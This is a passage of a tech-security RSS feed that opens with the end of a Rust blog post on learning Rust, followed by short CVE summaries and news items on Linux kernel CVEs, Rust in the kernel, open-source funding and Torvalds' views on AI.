<p>Across these conversations, the experience of learning Rust depended heavily on context. Why someone was learning and what support they had mattered as much as the borrow checker. The same kinds of examples kept coming up: a training course that got a team to a shared baseline, a maintainer answering a student's first GitHub issue, and a colleague whose code showed that cloning was okay.</p>
<p>That context is largely something the community has a hand in. With that in mind, here is what we take away from what we heard, and what we still don't know.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-seems-worth-trying"></a>
What seems worth trying</h4>
<p><strong>Learning materials aimed at unlearning.</strong> Syntax barely came up when people described their struggles. People struggled with unlearning habits from previous languages, whether OOP structuring from C++ and Java or the instinct to grab a raw pointer to a peripheral. Most of our learning materials teach Rust from first principles, and that works. What we didn't come across is much written for, say, the engineer with ten years of Java who lands on a Rust team after a reorg: material that names the patterns they'll reach for that won't transfer, and shows what to do instead. The professor we spoke with did a version of this in the classroom, leaning on "traits are like interfaces in Java" and saving generics for later in the course, and the students did fine. Something similar could work outside the classroom too.</p>
<p><strong>Put the "clone freely while you're learning" advice somewhere official.</strong> Every experienced developer we spoke with gave the same advice, but learners seem to mostly pick it up by accident, like the researcher who happened to see someone else cloning the struct they had been carefully threading lifetimes through. Saying it early in official materials would take some of the steepness out of the curve. The broader version belongs there too: idiomatic Rust doesn't have to mean optimal Rust, especially on a first project.</p>
<p><strong>Diagnostics are already a primary learning resource: several people told us the compiler taught them lifetimes before any documentation did.</strong> Diagnostics reach learners right at the moment they're stuck. When writing new ones, it seems worth keeping the confused newcomer in mind alongside the expert, because for a lot of people this is where the learning happens.</p>
<p><strong>Is "the book" actually out of date?</strong> Whether or not The Rust Programming Language or other materials are actually behind, a team evaluating Rust looked at its repository, saw unresolved issues and unmerged PRs, and moved on. As more companies evaluate adoption, more people will look at these materials with the same fresh eyes. Visible issue triage and some communication about what's current and what's planned would address the perception, separately from whatever content work may or may not be needed.</p>
<p><strong>How stuck learners get treated is shaping who stays.</strong> We heard about students getting answers on GitHub from the maintainers who wrote the code, and we heard about learners being told their struggles were a skill issue. The first group came away with a lasting good impression of Rust. Some of the second group walked away entirely, and because they leave quietly, it's easy to underestimate how many of them there are. The welcoming side of the community came up unprompted as a reason people stayed, so we know it makes a difference when we get this right.</p>
<p><strong>Every organization we spoke with described essentially the same ramp-up for bringing a team to Rust.</strong> Teams that brought groups of developers to Rust described roughly the same approach: get everyone to a shared baseline with a training course or with The Rust Programming Language and Rustlings, start people on lower-risk tickets, and give them somewhere internal to ask questions. Several organizations also found that hiring developers without Rust experience and ramping them up worked out better than continuing to search for rare expertise in another language. None of this is complicated, and teams weighing adoption don't need to invent a training program from scratch.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-we-still-don-t-know"></a>
What we still don't know</h4>
<p>The biggest gap is the people we didn't reach. Nearly everyone we spoke with stuck with Rust long enough to be reachable through Rust channels, so the stories of bouncing off came to us second-hand: a friend who walked away from embedded Rust, colleagues who quietly stopped after the responses they got. As we wrote in <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">our first post</a>, finding people who decided against Rust takes targeted outreach. If the proposed User Research team comes together, talking with learners who bounced would make a good early project, and learning is probably the area where that research would teach us the most.</p>
<p>We also don't know what to make of LLMs as a learning tool yet. They came up as a search engine, as an example generator, and in one organization's case as something that makes training high school graduates into working Rust developers possible. We saw a classroom where the C cohort leaned on LLMs in ways the Rust cohort couldn't, and we don't have an explanation for it. All of this comes from a handful of conversations, so we treat it as a set of leads to follow up on. Given how quickly the tools are changing, it seems better to study this deliberately than to wait and see what folklore develops.</p>
<p>The folks we spoke with showed that people do get there: with enough passes through the materials and enough code written, it eventually clicks. The opportunities above are mostly about making it work for the people who didn't pick Rust on purpose, and for the ones who would have stuck around if their early experience had gone a little differently.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-65696 | sct Overseerr up to 1.35.0 Push Subscription API userId authorization]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in sct Overseerr up to 1.35.0. This affects an unknown part of the component Push Subscription API. The manipulation of the argument userId results in authorization bypass. This vulnerability only affects products that are no longer suppor...]]></description>
<link>https://tsecurity.de/de/3689949/sicherheitsluecken/cve-2026-65696-sct-overseerr-up-to-1350-push-subscription-api-userid-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689949/sicherheitsluecken/cve-2026-65696-sct-overseerr-up-to-1350-push-subscription-api-userid-authorization/</guid>
<pubDate>Thu, 23 Jul 2026 20:19:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/sct:overseerr">sct Overseerr up to 1.35.0</a>. This affects an unknown part of the component <em>Push Subscription API</em>. The manipulation of the argument <em>userId</em> results in authorization bypass. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-65696">CVE-2026-65696</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anonymisierendes Linux Tails 7.10: Neuer Shutdown und Videoplayer]]></title>
<description><![CDATA[Die Maintainer der anonymisierenden Linux-Distribution Tails setzen zum Shutdown auf Gnome-Standard. Neu ist der Videoplayer Celluloid.]]></description>
<link>https://tsecurity.de/de/3689173/it-nachrichten/anonymisierendes-linux-tails-710-neuer-shutdown-und-videoplayer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689173/it-nachrichten/anonymisierendes-linux-tails-710-neuer-shutdown-und-videoplayer/</guid>
<pubDate>Thu, 23 Jul 2026 15:20:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Maintainer der anonymisierenden Linux-Distribution Tails setzen zum Shutdown auf Gnome-Standard. Neu ist der Videoplayer Celluloid.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anonymisierendes Linux Tails 7.10: Neuer Shutdown und Videoplayer]]></title>
<description><![CDATA[Die Maintainer der anonymisierenden Linux-Distribution Tails setzen zum Shutdown auf Gnome-Standard. Neu ist der Videoplayer Celluloid.]]></description>
<link>https://tsecurity.de/de/3689148/it-security-nachrichten/anonymisierendes-linux-tails-710-neuer-shutdown-und-videoplayer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689148/it-security-nachrichten/anonymisierendes-linux-tails-710-neuer-shutdown-und-videoplayer/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Maintainer der anonymisierenden Linux-Distribution Tails setzen zum Shutdown auf Gnome-Standard. Neu ist der Videoplayer Celluloid.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16631 | publint up to 0.1.4 package-manager Command src/node/pack.js child_process.exec os command injection (Issue 236 / EUVD-2026-47863)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in publint up to 0.1.4. This impacts the function child_process.exec of the file src/node/pack.js of the component package-manager Command Handler. The manipulation results in os command injection.

This vulnerability is known as CVE-20...]]></description>
<link>https://tsecurity.de/de/3687891/sicherheitsluecken/cve-2026-16631-publint-up-to-014-package-manager-command-srcnodepackjs-childprocessexec-os-command-injection-issue-236-euvd-2026-47863/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687891/sicherheitsluecken/cve-2026-16631-publint-up-to-014-package-manager-command-srcnodepackjs-childprocessexec-os-command-injection-issue-236-euvd-2026-47863/</guid>
<pubDate>Thu, 23 Jul 2026 04:46:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/publint">publint up to 0.1.4</a>. This impacts the function <code>child_process.exec</code> of the file <em>src/node/pack.js</em> of the component <em>package-manager Command Handler</em>. The manipulation results in os command injection.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-16631">CVE-2026-16631</a>. Attacking locally is a requirement. Furthermore, an exploit is available.

It is advisable to implement a patch to correct this issue.

The project maintainer explains: "I think it's very rare for someone to use this package with untrusted input".]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Kernel Team Publishes 432 CVEs In Two Days]]></title>
<description><![CDATA[Ancient Slashdot reader alanw shares a post from the OSS Security mailing list, where sysadmin Jan Schaumann wonders what to do after the Linux kernel cranked out 432 CVEs in a little over 24 hours: "I understand the position that CVEs were always a flawed way to track or prioritize security chan...]]></description>
<link>https://tsecurity.de/de/3687597/linux-tipps/linux-kernel-team-publishes-432-cves-in-two-days/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687597/linux-tipps/linux-kernel-team-publishes-432-cves-in-two-days/</guid>
<pubDate>Wed, 22 Jul 2026 23:06:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ancient Slashdot reader alanw shares a post from the OSS Security mailing list, where sysadmin Jan Schaumann wonders what to do after the Linux kernel cranked out 432 CVEs in a little over 24 hours: "I understand the position that CVEs were always a flawed way to track or prioritize security changes... But this onslaught really shows it's not feasible to attempt to prioritize individual kernel changes. I'm not sure what to do here going forward." The Register reports: The nixCraft team speculated on social media that AI bug reports are a likely reason for all those kernel CVEs, which wouldn't be without precedent - Linus Torvalds himself said in May that the Linux kernel security mailing list had become "almost entirely unmanageable" due to AI-assisted bug hunting. Nonetheless, Torvalds has described AI as a useful tool for Linux development while still noting it can be a drag for maintainers, both from a workload standpoint and the fact "it keeps finding embarrassing bugs." [...]
 
Unfortunately for Linux sysadmins, the position in which they find themselves in this current mess isn't one that's readily solved. CVEs might be a messy way to track and prioritize security updates, especially when hundreds of them are published over a short period, but without something better, it falls to IT and security teams to determine which vulnerabilities affect their systems and which kernel updates they need to deploy. Senior kernel maintainer Greg Kroah-Hartman replied to Jan's post, pushing back on the idea that the kernel's CVE volume is uniquely unmanageable. The kernel isn't special, he argues -- companies everywhere are finally realizing they need to re-evaluate how they update all of their systems and devices, something that's traditionally been "woefully ignored."
 
On the "just always update" approach, Greg says that's precisely what the kernel community endorses: "This is what the kernel developer community recommends and supports. If you want support from us, do this." Can't manage it yourself? Pay a company for support, or "just use Debian or Yocto as their security practices are amazing." He points to Android as proof the approach scales, calling it "the largest deployment of software in the world" -- billions of devices kept updated "with one very-overworked developer guiding it all."
 
As for reviewing every CVE individually, he notes this can be largely automated by intersecting the files a CVE touches with the files you actually build, which typically trims the relevant set "down to about 10% of the overall total" -- the approach enterprise distros already take for their customers. Panic-mode selective patching gets a blunt "Good luck with that!" -- regulations like the EU's Cyber Resilience Act are set to legislate that habit away ("rightfully so," in his view), and "your insurance company might wish to have a talk with you as well."
 
Greg also warns the flood isn't over: "The number of llm-found issues is only on the rise right now, it's going to be a very long 18 months at the least to dig ourselves out of this mess, and people had BETTER be updating their systems all along the way if they expect to be secure in any way." As for the 432-CVE burst itself, he explains it was simply him catching up on a weeks-old, publicly visible review queue over the weekend -- delayed by "a perfect storm of 6 weeks straight of conferences and vacations" -- so it shouldn't have come as a surprise to anyone watching the public git repo.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linux+Kernel+Team+Publishes+432+CVEs+In+Two+Days%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F22%2F2033256%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F22%2F2033256%2Flinux-kernel-team-publishes-432-cves-in-two-days%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/22/2033256/linux-kernel-team-publishes-432-cves-in-two-days?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3902 | GitLab up to 15.4.5/15.5.4/15.6.0 Project Maintainer log file (Issue 381895 / EUVD-2022-43238)]]></title>
<description><![CDATA[A vulnerability was found in GitLab up to 15.4.5/15.5.4/15.6.0 and classified as problematic. This affects an unknown function of the component Project Maintainer Handler. Executing a manipulation can lead to sensitive information in log files.

This vulnerability is registered as CVE-2022-3902. ...]]></description>
<link>https://tsecurity.de/de/3686057/sicherheitsluecken/cve-2022-3902-gitlab-up-to-154515541560-project-maintainer-log-file-issue-381895-euvd-2022-43238/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686057/sicherheitsluecken/cve-2022-3902-gitlab-up-to-154515541560-project-maintainer-log-file-issue-381895-euvd-2022-43238/</guid>
<pubDate>Wed, 22 Jul 2026 13:03:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/gitlab">GitLab up to 15.4.5/15.5.4/15.6.0</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown function of the component <em>Project Maintainer Handler</em>. Executing a manipulation can lead to sensitive information in log files.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2022-3902">CVE-2022-3902</a>. It is possible to launch the attack remotely. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Open-source maintainers still work underfunded as sponsorship crosses $100 million]]></title>
<description><![CDATA[A maintainer patches a library late at night that ships inside thousands of products, and no invoice follows. Sebastián Ramírez and Caleb Porzio spent years in that position. Ramírez, known as tiangolo, builds tools that other Python projects depend on.…
Read more →
The post Open-source maintaine...]]></description>
<link>https://tsecurity.de/de/3683133/it-security-nachrichten/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683133/it-security-nachrichten/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/</guid>
<pubDate>Tue, 21 Jul 2026 11:10:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A maintainer patches a library late at night that ships inside thousands of products, and no invoice follows. Sebastián Ramírez and Caleb Porzio spent years in that position. Ramírez, known as tiangolo, builds tools that other Python projects depend on.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/">Open-source maintainers still work underfunded as sponsorship crosses $100 million</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open-source maintainers still work underfunded as sponsorship crosses $100 million]]></title>
<description><![CDATA[A maintainer patches a library late at night that ships inside thousands of products, and no invoice follows. Sebastián Ramírez and Caleb Porzio spent years in that position. Ramírez, known as tiangolo, builds tools that other Python projects depend on. Porzio built Livewire and Alpine.js, tools ...]]></description>
<link>https://tsecurity.de/de/3683078/it-security-nachrichten/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683078/it-security-nachrichten/open-source-maintainers-still-work-underfunded-as-sponsorship-crosses-100-million/</guid>
<pubDate>Tue, 21 Jul 2026 10:54:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A maintainer patches a library late at night that ships inside thousands of products, and no invoice follows. Sebastián Ramírez and Caleb Porzio spent years in that position. Ramírez, known as tiangolo, builds tools that other Python projects depend on. Porzio built Livewire and Alpine.js, tools thousands of web developers reach for. That gap carries a cost. Critical projects lose their maintainers to salaried jobs elsewhere, security fixes slow down, and the software supply chain … <a href="https://www.helpnetsecurity.com/2026/07/21/open-source-github-sponsors-100-million/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/21/open-source-github-sponsors-100-million/">Open-source maintainers still work underfunded as sponsorship crosses $100 million</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[„HollowByte“: Denial-of-Service-Lücke in OpenSSL]]></title>
<description><![CDATA[Die OpenSSL-Maintainer haben stillschweigend eine Denial-of-Service-Lücke geschlossen. Okta nennt sie „HollowByte“.]]></description>
<link>https://tsecurity.de/de/3681022/it-security-nachrichten/hollowbyte-denial-of-service-luecke-in-openssl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681022/it-security-nachrichten/hollowbyte-denial-of-service-luecke-in-openssl/</guid>
<pubDate>Mon, 20 Jul 2026 13:39:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die OpenSSL-Maintainer haben stillschweigend eine Denial-of-Service-Lücke geschlossen. Okta nennt sie „HollowByte“.]]></content:encoded>
</item>
<item>
<title><![CDATA[„HollowByte“: Denial-of-Service-Lücke in OpenSSL]]></title>
<description><![CDATA[Die OpenSSL-Maintainer haben stillschweigend eine Denial-of-Service-Lücke geschlossen. Okta nennt sie „HollowByte“.]]></description>
<link>https://tsecurity.de/de/3680992/it-nachrichten/hollowbyte-denial-of-service-luecke-in-openssl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680992/it-nachrichten/hollowbyte-denial-of-service-luecke-in-openssl/</guid>
<pubDate>Mon, 20 Jul 2026 13:33:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die OpenSSL-Maintainer haben stillschweigend eine Denial-of-Service-Lücke geschlossen. Okta nennt sie „HollowByte“.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680295/it-security-nachrichten/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Mon, 20 Jul 2026 07:54:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16129 | princezuda SafestClaw up to 4.2.4 Built-in Web Interface shell.py ShellAction._validate_command incomplete blacklist (Issue 59 / EUVD-2026-45390)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in princezuda SafestClaw up to 4.2.4. This vulnerability affects the function ShellAction._validate_command of the file src/safestclaw/actions/shell.py of the component Built-in Web Interface. Such manipulation leads to incomplete blacklist.

...]]></description>
<link>https://tsecurity.de/de/3679285/sicherheitsluecken/cve-2026-16129-princezuda-safestclaw-up-to-424-built-in-web-interface-shellpy-shellactionvalidatecommand-incomplete-blacklist-issue-59-euvd-2026-45390/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679285/sicherheitsluecken/cve-2026-16129-princezuda-safestclaw-up-to-424-built-in-web-interface-shellpy-shellactionvalidatecommand-incomplete-blacklist-issue-59-euvd-2026-45390/</guid>
<pubDate>Sun, 19 Jul 2026 12:09:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/princezuda:safestclaw">princezuda SafestClaw up to 4.2.4</a>. This vulnerability affects the function <code>ShellAction._validate_command</code> of the file <em>src/safestclaw/actions/shell.py</em> of the component <em>Built-in Web Interface</em>. Such manipulation leads to incomplete blacklist.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-16129">CVE-2026-16129</a>. An attack has to be approached locally. Furthermore, there is an exploit available.

The presence of this vulnerability remains uncertain at this time.

The project maintainer explains: "On paper you're correct, this is a vulnerability. In practice, nothing your AI generated shows how it makes users vulnerable. It's open source. Someone can mod the shell allow list or remove that system. Present an actual poc that shows a threat to users."]]></content:encoded>
</item>
<item>
<title><![CDATA[Java was a three-day hotfix away from dying horribly on stage]]></title>
<description><![CDATA[Tim Lindholm, Java's original JVM maintainer, shares with El Reg some of the grungy build details the doc glosses over]]></description>
<link>https://tsecurity.de/de/3678094/it-nachrichten/java-was-a-three-day-hotfix-away-from-dying-horribly-on-stage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678094/it-nachrichten/java-was-a-three-day-hotfix-away-from-dying-horribly-on-stage/</guid>
<pubDate>Sat, 18 Jul 2026 15:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tim Lindholm, Java's original JVM maintainer, shares with El Reg some of the grungy build details the doc glosses over]]></content:encoded>
</item>
<item>
<title><![CDATA[NextBSD returns to dollop Apple source on FreeBSD]]></title>
<description><![CDATA[New maintainer revives the project with Darwin components, Gershwin, and Claude Code]]></description>
<link>https://tsecurity.de/de/3677648/it-nachrichten/nextbsd-returns-to-dollop-apple-source-on-freebsd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677648/it-nachrichten/nextbsd-returns-to-dollop-apple-source-on-freebsd/</guid>
<pubDate>Sat, 18 Jul 2026 09:48:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[New maintainer revives the project with Darwin components, Gershwin, and Claude Code]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-4990 | ASUS AI Suite 3 up to 3.2.x IOCTL improper validation of specified quantity in input]]></title>
<description><![CDATA[A vulnerability was found in ASUS AI Suite 3 up to 3.2.x. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component IOCTL Handler. Such manipulation leads to improper validation of specified quantity in input. This vulnerability only affects pro...]]></description>
<link>https://tsecurity.de/de/3676429/sicherheitsluecken/cve-2022-4990-asus-ai-suite-3-up-to-32x-ioctl-improper-validation-of-specified-quantity-in-input/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676429/sicherheitsluecken/cve-2022-4990-asus-ai-suite-3-up-to-32x-ioctl-improper-validation-of-specified-quantity-in-input/</guid>
<pubDate>Fri, 17 Jul 2026 17:13:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/asus:ai_suite_3">ASUS AI Suite 3 up to 3.2.x</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is an unknown functionality of the component <em>IOCTL Handler</em>. Such manipulation leads to improper validation of specified quantity in input. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2022-4990">CVE-2022-4990</a>. The attack needs to be performed locally. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-4989 | ASUS AI Suite 3 up to 3.2.x IOCTL improper validation of specified quantity in input]]></title>
<description><![CDATA[A vulnerability was found in ASUS AI Suite 3 up to 3.2.x and classified as critical. This impacts an unknown function of the component IOCTL Handler. The manipulation results in improper validation of specified quantity in input. This vulnerability only affects products that are no longer support...]]></description>
<link>https://tsecurity.de/de/3676427/sicherheitsluecken/cve-2022-4989-asus-ai-suite-3-up-to-32x-ioctl-improper-validation-of-specified-quantity-in-input/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676427/sicherheitsluecken/cve-2022-4989-asus-ai-suite-3-up-to-32x-ioctl-improper-validation-of-specified-quantity-in-input/</guid>
<pubDate>Fri, 17 Jul 2026 17:12:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/asus:ai_suite_3">ASUS AI Suite 3 up to 3.2.x</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts an unknown function of the component <em>IOCTL Handler</em>. The manipulation results in improper validation of specified quantity in input. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2022-4989">CVE-2022-4989</a>. The attack must be initiated from a local position. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI OK in Linux development, says Torvalds]]></title>
<description><![CDATA[Linus Torvalds has a complicated relationship with AI, seeing both its good and bad points. But his latest remarks on the usefulness of AI may have raised a few eyebrows in open-source circles.



Just a few weeks after the Linux founder complained that a “continued flood” of AI-generated vulnera...]]></description>
<link>https://tsecurity.de/de/3676311/ai-nachrichten/ai-ok-in-linux-development-says-torvalds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676311/ai-nachrichten/ai-ok-in-linux-development-says-torvalds/</guid>
<pubDate>Fri, 17 Jul 2026 16:19:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Linus Torvalds has a complicated relationship with AI, seeing both its good and bad points. But his latest remarks on the usefulness of AI may have raised a few eyebrows in open-source circles.</p>



